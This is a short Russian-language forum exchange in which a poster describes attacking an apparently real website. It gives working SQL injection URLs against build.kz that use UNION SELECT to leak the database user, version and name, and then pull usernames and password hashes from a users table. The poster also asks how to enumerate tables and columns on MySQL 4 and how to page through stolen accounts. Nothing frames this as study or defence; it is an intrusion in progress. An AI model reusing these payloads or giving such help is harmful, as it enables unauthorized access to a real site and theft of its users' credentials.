путь относительно корня (прлный). Если тебе нужно прочитать скрипт, то ищи раскрытие путей через выведенные ошибки или подбором (на практике, никогда не получалось)
Вот обьясните мне, ну вот нашел я уязвимость в скрипте вот
http://www.build.kz/index.php?page=inc/cut§or=comp&action=sublist&cid=-1+union+select+concat(user(),char(58),version(),ch ar(58),database()),2+/*
А как мне имена таблиц то и столбцов подобрать??? версия скулы то 4 чем пользоваться? или есть базы? поделитесь пжлст)))
Спасибо
вот что я нашел
http://www.build.kz/index.php?page=inc/cut§or=comp&action=sublist&cid=-1+union+select+concat(users_name,char(58),users_pa ssword),2+from+users%20limit+0,1/*
только проблема обьясните там что хэш пароля не до конца вылез или как? и почему то лимитом листать не получается что только один пользователь?